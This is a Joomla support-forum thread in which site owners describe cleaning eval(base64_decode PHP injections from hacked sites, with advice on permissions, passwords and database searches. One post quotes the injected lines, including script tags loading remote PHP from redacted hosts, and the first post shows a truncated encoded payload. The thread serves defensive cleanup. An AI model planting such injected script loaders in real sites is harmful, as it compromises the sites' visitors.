eval(base64_decode [SOLVED]

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
elindalo
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Sun Dec 09, 2007 9:54 pm

eval(base64_decode [SOLVED]

Post by elindalo » Mon Dec 15, 2008 4:58 pm

Hello all! In many pages of my web appear a strange code "<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFyd..............." and they have links to other pages externals and mine dont open totally. This is a example: http://xxxxxxxxxx where you can see my problem. I have read a lot about this theme in internet, but nobody coment a solution. Please, I delete all eva(base64.... that I see in my pages, but I dont fix all. Can I must delete something more? Sorry my poor english, and thanks in advance for your help. I think so many people have this problem. Please, what can I do? Greetings from Spain.
Last edited by elindalo on Fri Dec 19, 2008 2:26 pm, edited 1 time in total.

dragonrider
Joomla! Ace
Joomla! Ace
Posts: 1070
Joined: Mon Aug 22, 2005 7:53 pm
Location: Ilkley, West Yorkshire, UK
Contact:

Re: eval(base64_decode

Post by dragonrider » Wed Dec 17, 2008 12:21 pm

Check the configuration.php, index.php and templates/index.php files for the hacked code. Delete the code and resave. See if that fixes it. You will also need to make sure your files are set to no higher than 644 via CHMOD permissions.

elindalo
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Sun Dec 09, 2007 9:54 pm

Re: eval(base64_decode [SOLVED]

Post by elindalo » Fri Dec 19, 2008 2:24 pm

SOLVED

First, thank you very much, dragonrider, for your answer. I have followed that steps and I have deleted all code EVA(Base... that appear in these pages.

The problem, go on. Some pages have the error. I to grin and bear it. Third parts and permissions with "a little" flippancy for me. I am the only culpable.

SOLUTION:

Hallelujah!! at last! I see too much code EVA(Base... in FCKEDITOR folder I discover the problem there. I delete completly that folder.

Next, set, by first time in my joomla-life, all folders and files to 755 and 644. Now, if I need change a permission, I make it and return to security permission when finish the operation.

Lesson for me, all permissions are sacred now.

I hope this help to others members of this nice community. Greetings!

tez
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 248
Joined: Tue Nov 14, 2006 3:29 am
Contact:

Re: eval(base64_decode [SOLVED]

Post by tez » Tue Jun 08, 2010 3:24 am

Just has this happen to me today. I have cleaned my website, but in case someone else needs to know, see below.
Change your FTP password first.
Download entire site.
Delete all files on site (make another backup first!)
Find/Replace all bad code by checking file modified dates and finding all bad code, this is usually different every few days.

This was the lines inserted into various files.

Code: Select all

<?php eval(base64_decode('')); ?>
<?php eval(base64_decode('')); ?>
<script src=http://deleted/celebs/rumble.php ></script>


document.write('<script src=http://deleted.co.uk/images/deleted.php ><\/script>');
document.write('<script src=http://deleted/celebs/rumble.php ><\/script>');
document.write('<script src=http://deleted/celebs/rumble.php ><\/script>');
Also it created some files.

gifimg.php
changes.php
Last edited by mandville on Tue Jun 08, 2010 9:11 am, edited 1 time in total.
Reason: do not post infected code, links to infected code,

User avatar
toner728
Joomla! Intern
Joomla! Intern
Posts: 57
Joined: Wed Aug 27, 2008 1:55 pm
Location: New York City
Contact:

Re: eval(base64_decode [SOLVED]

Post by toner728 » Wed Apr 24, 2013 2:57 pm

Ok so.. I had this issue with several of my sites and i have fixed it very easily. First of all it happened because the permissions of my folders were writable. Shame on the original webmaster. This is how i fixed it.
I dont know what kind of web editor you guys use.. I use Dreamweaver.
So.. I pulled down the entire site to a folder. Dreamweaver has a ctrl-F function which lets you do a search on a file "or the entire site" do an entire site search for that base64 code and leave the replace field with nothing.. Blank!! It will search and remove the code from the entire site. Then just do a sync to put newer files back to the server and u will be good.. I did this with 8 different sites and they are all clean

User avatar
Tonie
Joomla! Master
Joomla! Master
Posts: 16553
Joined: Thu Aug 18, 2005 7:13 am

Re: eval(base64_decode [SOLVED]

Post by Tonie » Wed Apr 24, 2013 6:25 pm

Good that it's solved for you in this way. However, the cause of the hack hasn't been taken away by doing this.

User avatar
toner728
Joomla! Intern
Joomla! Intern
Posts: 57
Joined: Wed Aug 27, 2008 1:55 pm
Location: New York City
Contact:

Re: eval(base64_decode [SOLVED]

Post by toner728 » Wed Apr 24, 2013 8:23 pm

Obviously the permissions have to be set as well as passwords changed.
Did I really have to mention that?

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: eval(base64_decode [SOLVED]

Post by mandville » Wed Apr 24, 2013 9:56 pm

toner728 wrote:Obviously the permissions have to be set as well as passwords changed.
Did I really have to mention that?
might be best to run and post the fpa after runing security checklist 7
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
Tonie
Joomla! Master
Joomla! Master
Posts: 16553
Joined: Thu Aug 18, 2005 7:13 am

Re: eval(base64_decode [SOLVED]

Post by Tonie » Thu Apr 25, 2013 8:19 am

If I understood you correctly, you did the following:

- you removed the nastly code by search/replace
- then set permissions/changes passwords

This takes care of the hack showing to the public. Now the question is, how did the hacker enter your site in the first place? Through Joomla, webserver, one of the extensions, etc. This is not done just by the permissions on the server.

User avatar
pictureperfectne
Joomla! Intern
Joomla! Intern
Posts: 54
Joined: Sat Dec 02, 2006 3:41 am
Location: Stafford Springs CT
Contact:

Re: eval(base64_decode [SOLVED]

Post by pictureperfectne » Fri Jun 21, 2013 4:59 pm

I'm probably late to the game but my host told me yesterday that only my joomla site out of all their hundreds of clients got hacked. Every php file in every folder was infected with eval(base 64_decode in it.) that's hundreds of files. I got a clean joomla zip file, uploaded and overlaid all of the joomla core files and then went through to clean up the rest.
The only way to access the root folder to do this kind of damage is through the server access like ftp. Does anyone have an htaccess file that uses ip addresses instead of password and user, because it somehow broke through the server using an http request. and was changing the permissions a good fix?

Thanks
Picture  Perfect of New England
Middle River Art Gallery
http://www.middlerivergallery.com

User avatar
toner728
Joomla! Intern
Joomla! Intern
Posts: 57
Joined: Wed Aug 27, 2008 1:55 pm
Location: New York City
Contact:

Re: eval(base64_decode [SOLVED]

Post by toner728 » Sat Jun 22, 2013 11:03 am

@pictureperfectne.. I would do a search in the DB because when it happened to us, our clients database had the code in it as well.

User avatar
pictureperfectne
Joomla! Intern
Joomla! Intern
Posts: 54
Joined: Sat Dec 02, 2006 3:41 am
Location: Stafford Springs CT
Contact:

Re: eval(base64_decode [SOLVED]

Post by pictureperfectne » Sat Jun 22, 2013 1:31 pm

Thanks for the heads up. I'l do a sql dump and a keyword search. I really think that I need to protect the folders better with htaccess
Picture  Perfect of New England
Middle River Art Gallery
http://www.middlerivergallery.com


Locked

Return to “Security - 1.0.x”